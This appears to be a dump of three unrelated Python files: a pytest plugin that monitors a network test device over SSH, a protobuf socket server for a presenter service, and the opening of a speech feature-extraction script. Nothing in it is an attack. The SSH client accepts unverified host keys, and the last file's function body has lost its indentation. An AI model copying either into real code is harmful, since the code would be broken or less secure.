DUT_CPU_LOG = "/tmp/cpu.log"
DUT_RAM_LOG = "/tmp/ram.log"
DUT_HDD_LOG = "/tmp/hdd.log"
# Default thresholds file shipped next to this plugin; may be replaced at
# runtime via the --thresholds_file option (see pytest_configure).
THRESHOLDS = os.path.join(os.path.split(__file__)[0], "thresholds.yml")
def pytest_addoption(parser):
    """Describe plugin specified options.

    --dut_monitor enables the plugin; --thresholds_file optionally replaces
    the default thresholds.yml shipped next to this module.
    """
    parser.addoption("--dut_monitor", action="store_true", default=False,
                     help="Enable DUT hardware resources monitoring")
    parser.addoption("--thresholds_file", action="store", default=None, help="Path to the custom thresholds file")
def pytest_configure(config):
    """Register the monitoring plugin and apply a custom thresholds file if given."""
    if config.option.dut_monitor:
        config.pluginmanager.register(DUTMonitorPlugin(), "dut_monitor")
    if config.option.thresholds_file:
        # Override the module-level default path with the user-supplied one.
        global THRESHOLDS
        THRESHOLDS = config.option.thresholds_file
def pytest_unconfigure(config):
    """Unregister the monitoring plugin on pytest shutdown.

    NOTE(review): pytest_configure registers the plugin with the
    pluginmanager but never sets a 'dut_monitor' attribute on config, so
    this branch looks unreachable as written — confirm intent.
    """
    dut_monitor = getattr(config, "dut_monitor", None)
    if dut_monitor:
        # The local variable still references the plugin after the attribute
        # is deleted, so the unregister call below remains valid.
        del config.dut_monitor
        config.pluginmanager.unregister(dut_monitor)
class DUTMonitorPlugin(object):
    """
    Pytest plugin which defines:
    - pytest fixtures: 'dut_ssh' and 'dut_monitor'
    - handlers to verify that measured CPU, RAM and HDD values during each test item execution
    does not exceed defined threshold
    """
    @pytest.fixture(autouse=True, scope="session")
    def dut_ssh(self, testbed, creds):
        """Establish SSH connection with DUT (kept open for the whole session)."""
        ssh = DUTMonitorClient(host=testbed["dut"], user=creds["sonicadmin_user"],
                               password=creds["sonicadmin_password"])
        yield ssh

    @pytest.fixture(autouse=True, scope="function")
    def dut_monitor(self, dut_ssh, localhost, duthost, testbed_devices):
        """
        For each test item starts monitoring of hardware resources consumption on the DUT.
        After the test, downloads the measurement logs and verifies them against
        the effective thresholds, raising a single summary exception on failure.

        Yields:
            dict: thresholds effective for the current DUT platform/hwsku.
        """
        monitor_exceptions = []
        # Start monitoring on DUT
        dut_ssh.start()
        # Read file with defined thresholds
        with open(THRESHOLDS) as stream:
            general_thresholds = yaml.safe_load(stream)
        # Copy the defaults so the platform/hwsku overrides below do not
        # mutate the shared "default" mapping inside general_thresholds.
        dut_thresholds = dict(general_thresholds["default"])
        dut_platform = testbed_devices["dut"].facts["platform"]
        dut_hwsku = testbed_devices["dut"].facts["hwsku"]
        if dut_platform in general_thresholds:
            dut_thresholds.update(general_thresholds[dut_platform]["default"])
            # The platform section may define no per-hwsku overrides at all.
            if dut_hwsku in general_thresholds[dut_platform].get("hwsku", {}):
                dut_thresholds.update(general_thresholds[dut_platform]["hwsku"][dut_hwsku])
        yield dut_thresholds
        # Stop monitoring on DUT
        dut_ssh.stop()
        # Download log files with CPU, RAM and HDD measurements data
        measurements = dut_ssh.get_log_files()
        # Verify hardware resources consumption does not exceed defined
        # thresholds. Collect all violations first so one failing check does
        # not hide the others.
        if measurements["hdd"]:
            try:
                self.assert_hhd(hdd_meas=measurements["hdd"], thresholds=dut_thresholds)
            except HDDThresholdExceeded as err:
                monitor_exceptions.append(err)
        if measurements["ram"]:
            try:
                self.assert_ram(ram_meas=measurements["ram"], thresholds=dut_thresholds)
            except RAMThresholdExceeded as err:
                monitor_exceptions.append(err)
        if measurements["cpu"]:
            try:
                self.assert_cpu(cpu_meas=measurements["cpu"], thresholds=dut_thresholds)
            except CPUThresholdExceeded as err:
                monitor_exceptions.append(err)
        if monitor_exceptions:
            # NOTE(review): 'err.message' is a Python 2 idiom; switch to
            # str(err) if this plugin is migrated to Python 3.
            raise Exception("\n".join(item.message for item in monitor_exceptions))

    def assert_hhd(self, hdd_meas, thresholds):
        """
        Verify that free disk space on the DUT is not overutilized.

        Args:
            hdd_meas: ordered mapping of timestamp -> used HDD value.
            thresholds: effective thresholds dict (uses "hdd_used").
        Raises:
            HDDThresholdExceeded: if any measurement exceeds the threshold.
        """
        overused = [(timestamp, used_hdd) for timestamp, used_hdd in hdd_meas.items()
                    if used_hdd > thresholds["hdd_used"]]
        if overused:
            fail_msg = "Used HDD threshold - {}\nHDD overuse:\n".format(thresholds["hdd_used"])
            raise HDDThresholdExceeded(fail_msg + "\n".join(str(item) for item in overused))

    def assert_ram(self, ram_meas, thresholds):
        """
        Verify that RAM resources on the DUT are not overutilized.

        Checks that no sample exceeds "ram_peak" and that RAM usage after the
        test returned to within "ram_delta" percent of the pre-test usage.

        Args:
            ram_meas: ordered mapping of timestamp -> used RAM value.
            thresholds: effective thresholds dict.
        Raises:
            RAMThresholdExceeded: if any of the checks fail.
        """
        failed = False
        peak_overused = []
        fail_msg = "\nRAM thresholds: peak - {}; before/after test difference - {}%\n".format(thresholds["ram_peak"],
                                                                                             thresholds["ram_delta"])
        for timestamp, used_ram in ram_meas.items():
            if used_ram > thresholds["ram_peak"]:
                peak_overused.append((timestamp, used_ram))
        if peak_overused:
            fail_msg = fail_msg + "RAM overuse:\n{}\n".format("\n".join(str(item) for item in peak_overused))
            failed = True
        # Take first and last RAM measurements (averaged over two samples when
        # enough are available). list() makes the slicing valid on Python 3 as
        # well, where dict.values() is a non-subscriptable view.
        ram_values = list(ram_meas.values())
        if len(ram_values) >= 4:
            before = sum(ram_values[0:2]) / 2
            after = sum(ram_values[2:4]) / 2
        else:
            before = ram_values[0]
            after = ram_values[-1]
        delta = thresholds["ram_delta"] / 100. * before
        if after >= before + delta:
            fail_msg = fail_msg + "RAM was not restored\nRAM before test {}; RAM after test {}\n".format(before, after)
            failed = True
        if failed:
            raise RAMThresholdExceeded(fail_msg)

    def assert_cpu(self, cpu_meas, thresholds):
        """
        Verify that CPU resources on the DUT are not overutilized.

        Checks:
        - total CPU above "cpu_total" lasting >= "cpu_measure_duration";
        - per-process CPU above "cpu_process" lasting >= "cpu_measure_duration";
        - average total CPU above "cpu_total_average".

        Args:
            cpu_meas: ordered mapping of timestamp -> {"total": value,
                "top_consumer": {consumption: process_name}}.
            thresholds: effective thresholds dict.
        Raises:
            CPUThresholdExceeded: if any of the checks fail.
        """
        total_overused = []
        process_overused = {}
        cpu_thresholds = "CPU thresholds: total - {}; per process - {}; average - {}\n".format(thresholds["cpu_total"],
                                                                                              thresholds["cpu_process"],
                                                                                              thresholds["cpu_total_average"])
        average_cpu = "\n> Average CPU consumption during test run {}; Threshold - {}\n"
        fail_msg = ""
        total_sum = 0
        t_format = "%Y-%m-%d %H:%M:%S"

        def handle_process_measurements(p_name, t_first, t_last, p_average):
            """Compose fail message if process overuse CPU durig 'cpu_measure_duration' interval."""
            msg_template = "> Process '{}'\nAverage CPU overuse {} during {} seconds\n{}"
            duration = (t_last - t_first).total_seconds()
            if duration >= thresholds["cpu_measure_duration"]:
                # Bug fix: use the p_name parameter — the original referenced
                # the enclosing loop variable 'process_name' and ignored it.
                return msg_template.format(p_name,
                                           p_average,
                                           duration,
                                           "{} - {}\n".format(t_first.strftime(t_format),
                                                              t_last.strftime(t_format)))
            return ""

        def handle_total_measurements(overused_list):
            """Compose fail message if CPU utilization exceeds threshold during 'duration' interval."""
            fail_msg = ""
            start = datetime.strptime(overused_list[0][0], t_format)
            end = datetime.strptime(overused_list[-1][0], t_format)
            if (end - start).total_seconds() >= thresholds["cpu_measure_duration"]:
                fail_msg = "Total CPU overuse during {} seconds.\n{}\n\n".format((end - start).total_seconds(),
                                                                                "\n".join([str(item) for item in overused_list])
                                                                                )
            del overused_list[0:]
            return fail_msg

        # Walk measurements chronologically, tracking total-CPU overuse
        # streaks and collecting per-process overuse samples.
        for m_id, timestamp in enumerate(cpu_meas):
            # Collect total CPU utilization to calculate total average
            total_sum += cpu_meas[timestamp]["total"]
            if cpu_meas[timestamp]["total"] > thresholds["cpu_total"]:
                total_overused.append((timestamp, cpu_meas[timestamp]["total"]))
                # Flush an overuse streak that runs to the final measurement.
                if m_id == (len(cpu_meas) - 1):
                    fail_msg += handle_total_measurements(total_overused)
                    total_overused = []
            elif total_overused:
                # Streak ended: evaluate and reset it.
                fail_msg += handle_total_measurements(total_overused)
                total_overused = []
            for process_consumption, process_name in cpu_meas[timestamp]["top_consumer"].items():
                if process_consumption >= thresholds["cpu_process"]:
                    # Collect CPU samples per process when above the threshold.
                    process_overused.setdefault(process_name, []).append((timestamp, process_consumption))
        # Handle measurements per process: only runs of samples ~2-3 s apart
        # are treated as one continuous overuse interval.
        if process_overused:
            for process_name, process_consumption in process_overused.items():
                timestamps = []
                process_sum = 0
                for m_id, m_value in enumerate(process_consumption):
                    t_stamp = datetime.strptime(m_value[0], t_format)
                    process_sum += m_value[1]
                    if not timestamps:
                        timestamps.append(t_stamp)
                        continue
                    if (2 <= (t_stamp - timestamps[-1]).total_seconds() <= 3):
                        timestamps.append(t_stamp)
                        if m_id == (len(process_consumption) - 1):
                            fail_msg += handle_process_measurements(p_name=process_name,
                                                                   t_first=timestamps[0],
                                                                   t_last=timestamps[-1],
                                                                   p_average=process_sum / len(timestamps))
                    else:
                        fail_msg += handle_process_measurements(p_name=process_name,
                                                                t_first=timestamps[0],
                                                                t_last=timestamps[-1],
                                                                p_average=process_sum / len(timestamps))
                        timestamps = []
                        process_sum = 0
        # Calculate average CPU utilization
        if (total_sum / len(cpu_meas)) > thresholds["cpu_total_average"]:
            fail_msg += average_cpu.format(total_sum / len(cpu_meas), thresholds["cpu_total_average"])
        if fail_msg:
            raise CPUThresholdExceeded(cpu_thresholds + fail_msg)
class DUTMonitorClient(object):
    """
    DUTMonitorClient object establish SSH connection with DUT. Keeps SSH connection with DUT during full test run.
    Available features:
    - start/stop hardware resources monitoring on DUT
    - automatically restart monitoring script on the DUT in case of lose network connectivity (device reboot, etc.)
    """
    def __init__(self, host, user, password):
        """
        Args:
            host: DUT hostname or IP address.
            user: SSH user name.
            password: SSH password.
        """
        self.running = False     # True while monitoring is supposed to be active
        self.user = user
        self.password = password
        self.host = host
        self.run_channel = None  # channel executing dut_monitor.py; set in start()
        self.init()
        # Daemon thread which keeps the SSH session alive and restarts
        # monitoring after a reconnect (e.g. DUT reboot).
        self._thread = threading.Thread(name="Connection tracker", target=self._track_connection)
        self._thread.setDaemon(True)
        self._thread.start()

    def _track_connection(self):
        """
        @summary: Track network connectivity. Reestablish network connection in case of drop connection
        """
        while True:
            try:
                # Cheap probe command; raises when the transport is dead.
                self.ssh.exec_command("true", timeout=5)
            except (paramiko.SSHException, AttributeError):
                logger.warning("SSH connection dropped")
                logger.debug("Trying to reconnect...")
                self.close()
                try:
                    self.init()
                except Exception as err:
                    logger.debug(repr(err))
                else:
                    # Resume monitoring if it was active before the drop.
                    if self.running:
                        self.start()
            else:
                time.sleep(5)

    def _upload_to_dut(self):
        """
        @summary: Upload 'dut_monitor.py' module to the DUT '/tmp' folder
        """
        logger.debug("Uploading file to the DUT...")
        with self.ssh.open_sftp() as sftp:
            sftp.put(os.path.join(os.path.split(__file__)[0], "dut_monitor.py"), DUT_MONITOR)

    def init(self):
        """
        @summary: Connect to the DUT via SSH and authenticate to it.
        """
        logger.debug("Trying to establish connection ...")
        self.ssh = paramiko.SSHClient()
        self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        self.ssh.connect(self.host, username=self.user, password=self.password, timeout=5)

    def close(self):
        """
        @summary: Close this SSHClient and its underlying Transport
        """
        logger.debug("Close SSH connection with DUT")
        self.ssh.close()

    def exec_command(self, cmd, timeout=None):
        """
        @summary: Execute a command on the DUT and track possible connectivity issues.
                  A new Channel is opened and the requested command is executed
        @return: (stdin, stdout, stderr) tuple, or (None, None, None) when the
                 connection is broken.
        """
        try:
            return self.ssh.exec_command(cmd, timeout=timeout, get_pty=True)
        except Exception as err:
            logger.warning("Broken connection - {}".format(repr(err)))
            logger.warning("Skip command {}".format(cmd))
            return (None, None, None)

    def start(self):
        """
        @summary: Start HW resources monitoring on the DUT.
                  Write obtained values to the following files on the DUT: DUT_CPU_LOG, DUT_RAM_LOG, DUT_HDD_LOG
        """
        self.running = True
        self._upload_to_dut()
        logger.debug("Start HW resources monitoring on the DUT...")
        self.run_channel = self.ssh.get_transport().open_session()
        self.run_channel.get_pty()
        self.run_channel.settimeout(5)
        # Start monitoring on DUT
        self.run_channel.exec_command("python {} --start".format(DUT_MONITOR))
        # Ensure monitoring started. Decode so the membership check works for
        # both str (Python 2) and bytes (Python 3) channel output.
        output = self.run_channel.recv(1024).decode("utf-8", "replace")
        if "Started resources monitoring ..." not in output:
            raise Exception("Failed to start monitoring on DUT: {}".format(output))

    def stop(self):
        """
        @summary: Stop resources monitoring by closing the channel which runs it.
        """
        self.running = False
        logger.debug("Stop resources monitoring on the DUT...")
        # Guard against stop() being called before start() ever ran.
        if self.run_channel is not None and not self.run_channel.closed:
            self.run_channel.close()

    def read_yml(self, file_pointer):
        """
        @summary: Read yaml file content. Convert it to the ordered data.
        @return: OrderedDict with keys sorted by timestamp, or empty dict for empty file.
        """
        with file_pointer as fp:
            measurements = yaml.safe_load("".join(fp))
        if measurements is None:
            return {}
        # Sort measurements by timestamp key to process logs chronologically.
        # sorted() works on both Python 2 and 3 (d.keys().sort() does not).
        return OrderedDict(sorted(measurements.items()))

    def get_log_files(self):
        """
        @summary: Fetch monitoring logs from device, parse, convert to dictionary with sorted order.
        @return: Dictionary with keys "cpu", "ram", "hdd", values contains appropriate measurements made on DUT.
        """
        logger.debug("Downloading file from the DUT...")
        # Use a single SFTP session for all three files and always close it
        # (the original opened three sessions and leaked every one of them).
        sftp = self.ssh.open_sftp()
        try:
            cpu_meas = self.read_yml(sftp.file(DUT_CPU_LOG))
            ram_meas = self.read_yml(sftp.file(DUT_RAM_LOG))
            hdd_meas = self.read_yml(sftp.file(DUT_HDD_LOG))
        finally:
            sftp.close()
        return {"cpu": cpu_meas, "ram": ram_meas, "hdd": hdd_meas}
|
presenter_socket_server.py | # =======================================================================
#
# Copyright (C) 2018, Hisilicon Technologies Co., Ltd. All Rights Reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1 Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2 Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3 Neither the names of the copyright holders nor the names of the
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# =======================================================================
#
"""presenter socket server module"""
import threading
import select
import struct
import logging
import socket
from google.protobuf.message import DecodeError
import common.presenter_message_pb2 as pb2
from common.channel_manager import ChannelManager
from common.channel_handler import ChannelHandler
# Empty result of socket.recv(): the peer closed the connection.
SOCK_RECV_NULL = b''
# epoll will return if no event coming in 1 s
EPOLL_TIMEOUT = 1
# it specifies the number of unaccepted connections that
# the system will allow before refusing new connections.
SOCKET_WAIT_QUEUE = 2
# message head length, include 4 bytes message total length
# and 1 byte message name length
MSG_HEAD_LENGTH = 5
# Socket server side of the presenter server.
class PresenterSocketServer():
    """A socket server communicating with the presenter agent.

    NOTE(review): subclasses are expected to provide 'self.channel_manager'
    and implement '_process_msg()' — neither is defined in this base class.
    """
    def __init__(self, server_address):
        """
        Args:
            server_address: server listen address,
                            include an ipv4 address and a port.
        """
        # thread exit switch, if set true, thread must exit immediately.
        self.thread_exit_switch = False
        # message head length, include 4 bytes message total length
        # and 1 byte message name length
        self.msg_head_len = MSG_HEAD_LENGTH
        # Create the listening socket and start the epoll listen thread.
        self._create_socket_server(server_address)

    def _create_socket_server(self, server_address):
        """
        create a socket server

        Args:
            server_address: server listen address,
                            include an ipv4 address and a port.
        """
        # Create a socket server.
        self._sock_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._sock_server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._sock_server.bind(server_address)
        self._sock_server.listen(SOCKET_WAIT_QUEUE)
        # Non-blocking: the listen thread multiplexes connections via epoll.
        self._sock_server.setblocking(False)
        # Get server host name and port
        host, port = self._sock_server.getsockname()[:2]
        # Start presenter socket server listen thread.
        threading.Thread(target=self._server_listen_thread).start()
        # Display directly on the screen
        print('Presenter socket server listen on %s:%s\n' % (host, port))

    def set_exit_switch(self):
        """set switch True to stop presenter socket server thread."""
        self.thread_exit_switch = True

    def _read_socket(self, conn, read_len):
        '''
        Read fixed length data

        Args:
            conn: a socket connection
            read_len: read fix byte.

        Returns:
            ret: True or False
            buf: read fix byte buf.
        '''
        has_read_len = 0
        total_buf = b''
        while has_read_len != read_len:
            try:
                read_buf = conn.recv(read_len - has_read_len)
            except socket.error:
                logging.error("socket %u exception:socket.error", conn.fileno())
                return False, None
            # recv() returning b'' means the peer closed the connection.
            if read_buf == b'':
                return False, None
            total_buf += read_buf
            has_read_len = len(total_buf)
        return True, total_buf

    def _read_msg_head(self, sock_fileno, conns):
        '''
        Read and decode the fixed-size message head.

        Args:
            sock_fileno: a socket fileno
            conns: all socket connections which created by server.

        Returns:
            msg_total_len: total message length, or None on error.
            msg_name_len: message name length, or None on error.
        '''
        ret, msg_head = self._read_socket(conns[sock_fileno], self.msg_head_len)
        if not ret:
            logging.error("socket %u receive msg head null", sock_fileno)
            return None, None
        # in Struct(), 'I' is unsigned int, 'B' is unsigned char
        msg_head_data = struct.Struct('IB')
        (msg_total_len, msg_name_len) = msg_head_data.unpack(msg_head)
        # The total length is transmitted in network byte order.
        msg_total_len = socket.ntohl(msg_total_len)
        return msg_total_len, msg_name_len

    def _read_msg_name(self, sock_fd, conns, msg_name_len):
        '''
        Read and decode the message name field.

        Args:
            sock_fd: a socket fileno
            conns: all socket connections which created by server.
            msg_name_len: message name length.

        Returns:
            ret: True or False
            msg_name: message name.
        '''
        ret, msg_name = self._read_socket(conns[sock_fd], msg_name_len)
        if not ret:
            logging.error("socket %u receive msg name null", sock_fd)
            return False, None
        try:
            msg_name = msg_name.decode("utf-8")
        except UnicodeDecodeError:
            logging.error("msg name decode to utf-8 error")
            return False, None
        return True, msg_name

    def _read_msg_body(self, sock_fd, conns, msg_body_len, msgs):
        '''
        Read the message body into msgs[sock_fd].

        Args:
            sock_fd: a socket fileno
            conns: all socket connections which created by server.
            msg_body_len: message body length.
            msgs: msg read from a socket

        Returns:
            ret: True or False
        '''
        ret, msg_body = self._read_socket(conns[sock_fd], msg_body_len)
        if not ret:
            logging.error("socket %u receive msg body null", sock_fd)
            return False
        msgs[sock_fd] = msg_body
        return True

    def _read_sock_and_process_msg(self, sock_fileno, conns, msgs):
        '''
        Read one complete message (head, name, body) and dispatch it.

        Args:
            sock_fileno: a socket fileno, return value of socket.fileno()
            conns: all socket connections registered in epoll
            msgs: msg read from a socket

        Returns:
            ret: True or False
        '''
        # Step1: read msg head
        msg_total_len, msg_name_len = self._read_msg_head(sock_fileno, conns)
        if msg_total_len is None:
            logging.error("msg_total_len is None.")
            return False
        # Step2: read msg name
        ret, msg_name = self._read_msg_name(sock_fileno, conns, msg_name_len)
        if not ret:
            return ret
        # Step3: read msg body
        msg_body_len = msg_total_len - self.msg_head_len - msg_name_len
        if msg_body_len < 0:
            logging.error("msg_total_len:%u, msg_name_len:%u, msg_body_len:%u",
                          msg_total_len, msg_name_len, msg_body_len)
            return False
        ret = self._read_msg_body(sock_fileno, conns, msg_body_len, msgs)
        if not ret:
            return ret
        # Step4: process msg (implemented by a subclass)
        ret = self._process_msg(conns[sock_fileno], msg_name, msgs[sock_fileno])
        return ret

    def _process_epollin(self, sock_fileno, epoll, conns, msgs):
        '''
        Handle an EPOLLIN event; drop the connection on any failure.

        Args:
            sock_fileno: a socket fileno, return value of socket.fileno()
            epoll: a set of select.epoll.
            conns: all socket connections registered in epoll
            msgs: msg read from a socket
        '''
        msgs[sock_fileno] = b''
        try:
            ret = self._read_sock_and_process_msg(sock_fileno, conns, msgs)
            if not ret:
                self._clean_connect(sock_fileno, epoll, conns, msgs)
        except socket.error:
            logging.error("receive socket error.")
            self._clean_connect(sock_fileno, epoll, conns, msgs)

    def _accept_new_socket(self, epoll, conns):
        '''
        Accept a new agent connection and register it with epoll.

        Args:
            epoll: a set of select.epoll.
            conns: all socket connections registered in epoll
        '''
        try:
            new_conn, address = self._sock_server.accept()
            # Per-connection reads are blocking; epoll decides when to read.
            new_conn.setblocking(True)
            epoll.register(new_conn.fileno(), select.EPOLLIN | select.EPOLLHUP)
            conns[new_conn.fileno()] = new_conn
            logging.info("create new connection:client-ip:%s, client-port:%s, fd:%s",
                         address[0], address[1], new_conn.fileno())
        except socket.error:
            logging.error("socket.error exception when sock.accept()")

    def _server_listen_thread(self):
        """socket server thread, epoll listening all the socket events"""
        epoll = select.epoll()
        epoll.register(self._sock_server.fileno(), select.EPOLLIN | select.EPOLLHUP)
        try:
            conns = {}
            msgs = {}
            while True:
                # thread must exit immediately
                if self.thread_exit_switch:
                    break
                events = epoll.poll(EPOLL_TIMEOUT)
                # timeout, but no event come, continue waiting
                if not events:
                    continue
                for sock_fileno, event in events:
                    # new connection request from presenter agent
                    if self._sock_server.fileno() == sock_fileno:
                        self._accept_new_socket(epoll, conns)
                    # remote connection closed
                    # it means presenter agent exit withot close socket.
                    elif event & select.EPOLLHUP:
                        logging.info("receive event EPOLLHUP")
                        self._clean_connect(sock_fileno, epoll, conns, msgs)
                    # new data coming in a socket connection
                    elif event & select.EPOLLIN:
                        self._process_epollin(sock_fileno, epoll, conns, msgs)
                    # receive event not recognize
                    else:
                        # event is an integer bitmask; %s (the original used %f).
                        logging.error("not recognize event %s", event)
                        self._clean_connect(sock_fileno, epoll, conns, msgs)
        finally:
            logging.info("conns:%s", conns)
            logging.info("presenter server listen thread exit.")
            epoll.unregister(self._sock_server.fileno())
            epoll.close()
            self._sock_server.close()

    def _process_heartbeat(self, conn):
        '''
        set heartbeat

        Args:
            conn: a socket connection

        Returns:
            True: set heartbeat ok.
        '''
        sock_fileno = conn.fileno()
        handler = self.channel_manager.get_channel_handler_by_fd(sock_fileno)
        if handler is not None:
            handler.set_heartbeat()
        return True

    def _process_open_channel(self, conn, msg_data):
        """
        Deserialization protobuf and process open_channel request

        Args:
            conn: a socket connection
            msg_data: a protobuf struct, include open channel request.

        Returns:
            True/False, result of _response_open_channel().

        protobuf structure like this:
            ----------------------------------------------
            |channel_name          |  string              |
            |----------------------------------------------
            |content_type          |  ChannelContentType  |
            |----------------------------------------------
            enum ChannelContentType {
                kChannelContentTypeImage = 0;
                kChannelContentTypeVideo = 1;
            }
        """
        request = pb2.OpenChannelRequest()
        response = pb2.OpenChannelResponse()
        try:
            # Parse the request payload sent by the presenter agent.
            request.ParseFromString(msg_data)
        except DecodeError:
            # Malformed request: respond with kOpenChannelErrorOther.
            logging.error("ParseFromString exception: Error parsing message")
            channel_name = "unknown channel"
            return self._response_open_channel(conn, channel_name, response,
                                               pb2.kOpenChannelErrorOther)
        # The channel name requested by the agent.
        channel_name = request.channel_name
        # check channel name if exist; create the channel on the fly if not.
        if not self.channel_manager.is_channel_exist(channel_name):
            logging.error("channel name %s is not exist.", channel_name)
            # if channel is not exist, need to create the channel
            ret = self.channel_manager.register_one_channel(channel_name)
            if ret != ChannelManager.err_code_ok:
                logging.error("Create the channel %s failed!, and ret is %d", channel_name, ret)
                err_code = pb2.kOpenChannelErrorOther
                # Bug fix: return here — the original fell through after
                # responding and opened the channel despite the failure.
                return self._response_open_channel(conn, channel_name,
                                                   response, err_code)
        # check channel path if busy: already opened by another agent.
        if self.channel_manager.is_channel_busy(channel_name):
            logging.error("channel path %s is busy.", channel_name)
            err_code = pb2.kOpenChannelErrorChannelAlreadyOpened
            return self._response_open_channel(conn, channel_name, response,
                                               err_code)
        # if channel type is image, need clean image if exist
        self.channel_manager.clean_channel_image(channel_name)
        # Determine whether the channel carries images or video.
        if request.content_type == pb2.kChannelContentTypeImage:
            media_type = "image"
        elif request.content_type == pb2.kChannelContentTypeVideo:
            media_type = "video"
        else:
            # Unknown media type: respond with kOpenChannelErrorOther.
            logging.error("media type %s is not recognized.",
                          request.content_type)
            return self._response_open_channel(conn, channel_name, response,
                                               pb2.kOpenChannelErrorOther)
        handler = ChannelHandler(channel_name, media_type)
        self.channel_manager.create_channel_resource(
            channel_name, conn.fileno(), media_type, handler)
        return self._response_open_channel(conn, channel_name, response,
                                           pb2.kOpenChannelErrorNone)

    def _response_open_channel(self, conn, channel_name, response, err_code):
        """
        Assemble protobuf to response open_channel request

        Args:
            conn: a socket connection
            channel_name: name of a channel.
            response: a protobuf response to presenter agent
            err_code: part of the response

        Returns:
            ret_code: True when err_code is kOpenChannelErrorNone, else False.

        Message structure like this:
        --------------------------------------------------------------------
        |total message len      |  int             |  4 bytes              |
        |-------------------------------------------------------------------
        |message name len       |  byte            |  1 byte               |
        |-------------------------------------------------------------------
        |message name           |  string          |  xx bytes             |
        |-------------------------------------------------------------------
        |message body           |  protobuf        |  xx bytes             |
        --------------------------------------------------------------------

        protobuf structure like this:
        --------------------------------------------------------------------
        |error_code             |  enum            |  OpenChannelErrorCode |
        |-------------------------------------------------------------------
        |error_message          |  string          |  xx bytes             |
        |-------------------------------------------------------------------
        enum OpenChannelErrorCode {
            kOpenChannelErrorNone = 0;
            kOpenChannelErrorNoSuchChannel = 1;
            kOpenChannelErrorChannelAlreadyOpened = 2;
            kOpenChannelErrorOther = -1;
        }
        """
        response.error_code = err_code
        ret_code = False
        if err_code == pb2.kOpenChannelErrorNoSuchChannel:
            response.error_message = "channel {} not exist." \
                                     .format(channel_name)
        elif err_code == pb2.kOpenChannelErrorChannelAlreadyOpened:
            response.error_message = "channel {} is busy.".format(channel_name)
        elif err_code == pb2.kOpenChannelErrorNone:
            response.error_message = "open channel succeed"
            ret_code = True
        else:
            response.error_message = "Unknown err open channel {}." \
                                     .format(channel_name)
        self.send_message(conn, response, pb2._OPENCHANNELRESPONSE.full_name)
        return ret_code

    def send_message(self, conn, protobuf, msg_name):
        '''
        API for send message

        Args:
            conn: a socket connection.
            protobuf: message body defined in protobuf.
            msg_name: msg name.

        Returns: NA
        '''
        message_data = protobuf.SerializeToString()
        message_len = len(message_data)
        msg_name_size = len(msg_name)
        msg_total_size = self.msg_head_len + msg_name_size + message_len
        # in Struct(), 'I' is unsigned int, 'B' is unsigned char
        s = struct.Struct('IB')
        # Total length goes on the wire in network byte order.
        msg_head = (socket.htonl(msg_total_size), msg_name_size)
        packed_msg_head = s.pack(*msg_head)
        msg_data = packed_msg_head + \
                   bytes(msg_name, encoding="utf-8") + message_data
        conn.sendall(msg_data)
|
feature_extract.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2019 Wu Yi-Chiao (Nagoya University)
# based on a WaveNet script by Tomoki Hayashi (Nagoya University)
# (https://github.com/kan-bayashi/PytorchWaveNetVocoder)
# based on sprocket-vc script by Kazuhiro Kobayashi (Nagoya University)
# (https://github.com/k2kobayashi/sprocket)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
from __future__ import division
import argparse
import logging
import multiprocessing as mp
import os
import sys
import copy
import pyworld
import numpy as np
from distutils.util import strtobool
from numpy.matlib import repmat
from scipy.interpolate import interp1d
from scipy.io import wavfile
from scipy.signal import firwin
from scipy.signal import lfilter
from sprocket.speech.feature_extractor import FeatureExtractor
from sprocket.speech.synthesizer import Synthesizer
from utils import (find_files, read_txt, read_hdf5, write_hdf5, check_hdf5)
def _get_arguments():
parser = argparse.ArgumentParser(
description="making feature file argsurations.")
# path setting
parser.add_argument("--waveforms", required=True,
type=str, help="directory or list of input wav files")
parser.add_argument("--feature_dir", default=None,
type=str, help="directory of output featfile")
# acoustic feature setting
parser.add_argument("--feature_type", default="world", choices=["world"],
type=str, help="feature type")
parser.add_argument("--feature_format", default="h5",
type=str, help="feature format")
parser.add_argument("--fs", default=22050,
type=int, help="sampling frequency")
parser.add_argument("--shiftms", default=5.0,
type=float, help="frame shift in msec")
parser.add_argument("--fftl", default=1024,
type=int, help="FFT length")
parser.add_argument("--minf0", default=40,
type=float, help="minimum f0")
parser.add_argument("--maxf0", default=400,
type=float, help="maximum f0")
parser.add_argument("--pow_th", default=-20,
type=float, help="speech power threshold")
parser.add_argument("--mcep_dim", default=34,
type=int, help="dimension of mel cepstrum")
parser.add_argument("--mcep_dim_start", default=2,
type=int, help="first dimension index of mel cepstrum")
parser.add_argument("--mcep_dim_end", default=37,
type=int, help="last dimension index of mel cepstrum")
parser.add_argument("--mcep_alpha", default=0.455,
type=float, help="Alpha of mel cepstrum")
parser.add_argument("--highpass_cutoff", default=70,
type=int, help="cut off frequency in lowpass filter")
